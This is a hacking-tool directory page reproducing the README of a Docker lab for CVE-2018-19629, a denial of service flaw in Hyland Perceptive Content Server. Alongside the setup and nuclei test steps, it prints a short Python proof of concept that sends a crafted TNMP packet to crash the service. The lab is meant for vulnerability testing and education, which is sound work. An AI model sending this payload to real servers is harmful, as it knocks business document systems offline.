Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2018-19629 — Hyland Perceptive Content Server - Denial of Service | Kitploit
Tools/GitHubGitHub/excellencedev/cve-2018-19629
Container SecurityVulnerability AnalysisExploitationLearning & EducationLabs & Practice
GitHubexcellencedev/cve-2018-19629

CVE-2018-19629

Hyland Perceptive Content Server - Denial of Service

View Repository
38 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2018-19629 Test Environment

Docker test environment for CVE-2018-19629 - Hyland Perceptive Content Server Denial of Service.

Vulnerability Details

FieldValue
CVE IDCVE-2018-19629
SeverityHigh (DoS)
Affected VersionsHyland Perceptive Content Server < 7.1.5
Patched Version7.1.5

Description

Hyland Perceptive Content Server before 7.1.5 contains a denial of service vulnerability caused by crashing the ImageNow Server service via a TCP connection. Attackers can disrupt the service by sending specially crafted TCP packets containing the TNMP header sequence.

Quick Start

root@kitploit:~
# Start the vulnerable environment
docker-compose up -d

# Verify it's listening
# (You might need netcat or similar)
nc -zv localhost 6000

Testing with Nuclei

root@kitploit:~
# Test with nuclei template
nuclei -t ../network/cves/2018/CVE-2018-19629.yaml -u localhost:6000

Manual Verification

You can manually trigger the crash using Python:

root@kitploit:~
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("localhost", 6000))
# The crafted packet
payload = b'\x54\x4e\x4d\x50\x04\x00\x00\x00\x54\x4e\x4d\x45\x00\x00\x04\x00'
s.send(payload)
s.close()

Check the logs to see the crash:

root@kitploit:~
docker logs -f imagenow-vuln

You should see: [!] CRITICAL: Recevied malicious 'TNMP' packet... followed by the container restarting.

Environment Details

  • Port: 6000 (TCP)
  • Protocol: Custom TCP (ImageNow)

Cleanup

root@kitploit:~
docker-compose down
Download Tool